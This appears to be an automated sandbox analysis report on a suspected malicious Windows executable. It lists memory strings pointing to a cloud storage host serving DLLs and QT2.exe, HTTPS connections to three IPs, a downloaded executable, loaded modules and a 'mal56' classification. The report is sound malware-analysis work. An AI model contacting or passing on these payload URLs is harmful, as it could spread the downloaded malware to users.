https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/$p
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322800773.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/$q
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322800773.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/4p
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/Dp
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322800773.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/Dq
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2271642131.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/QT2.exe
Source: LisectAVT_2403002B_78.exe, 00000000.00000002.2842779785.0000000000951000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/QT2.exeL
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/Tp
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/Tq
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/cximagecrt.dll
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/cximagecrt.dll9RB
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/cximagecrt.dllTCh
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322800773.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/dp
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/j
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322800773.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842779785.0000000000951000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp120.dll
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842928448.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322800773.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp120.dllR
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842928448.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322800773.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp120.dlluR
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp140.dll
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842928448.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp140.dllFM
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp140.dlldTCh
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcr120.dll
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842928448.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322800773.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcr120.dll7SH
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322800773.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcr120.dllCom
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2322800773.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcr120.dllTCh
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842928448.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322800773.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2322619540.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcr120.dllZR
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842968662.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514883040.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/tq
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/vcruntime140.d
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/vcruntime140.dTCh
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.0000000000990000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.0000000000990000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842990489.00000000009CC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514857442.00000000009CB000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/vcruntime140.dll
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2422110884.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343433367.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842990489.00000000009CC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2343554238.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514783099.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387984108.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2387801729.000000000099E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2514857442.00000000009CB000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000003.2421970685.000000000099E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/vcruntime140.dlld

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 43.152.64.193:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 43.153.232.151:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 159.75.57.35:443 -> 192.168.2.6:49723 version: TLS 1.2

Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Code function: 0_2_00AC2279	0_2_00AC2279
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Code function: 0_2_00ABC4A9	0_2_00ABC4A9
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Code function: 0_2_00AC06BC	0_2_00AC06BC
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Code function: 0_2_00ABBCA6	0_2_00ABBCA6
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Code function: 0_2_00AAFCF4	0_2_00AAFCF4
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Code function: 0_2_00AB1F40	0_2_00AB1F40

Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe

Code function: String function: 00AAA700 appears 52 times

Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 1156

Source: LisectAVT_2403002B_78.exe	Static PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: libcurl[1].dll.0.dr	Static PE information: Resource name: DLL type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: libcurl.dll.0.dr	Static PE information: Resource name: DLL type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

Source: LisectAVT_2403002B_78.exe, 00000000.00000000.2185024840.0000000000B19000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameWAB.EXEj% vs LisectAVT_2403002B_78.exe
Source: LisectAVT_2403002B_78.exe	Binary or memory string: OriginalFilenameWAB.EXEj% vs LisectAVT_2403002B_78.exe

Source: LisectAVT_2403002B_78.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal56.winEXE@3/20@4/3

Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe

File created: C:\Program Files (x86)\Mysoftwaref

Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\QT2[1].exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5504:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4800

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\0ccd21eb-5a44-4f40-890d-f7ecec0b3890

Jump to behavior

Source: LisectAVT_2403002B_78.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe "C:\Users\user\Desktop\LisectAVT_2403002B_78.exe"
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 1156

Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exe	Section loaded: rsaenh.dll	Jump to behavior
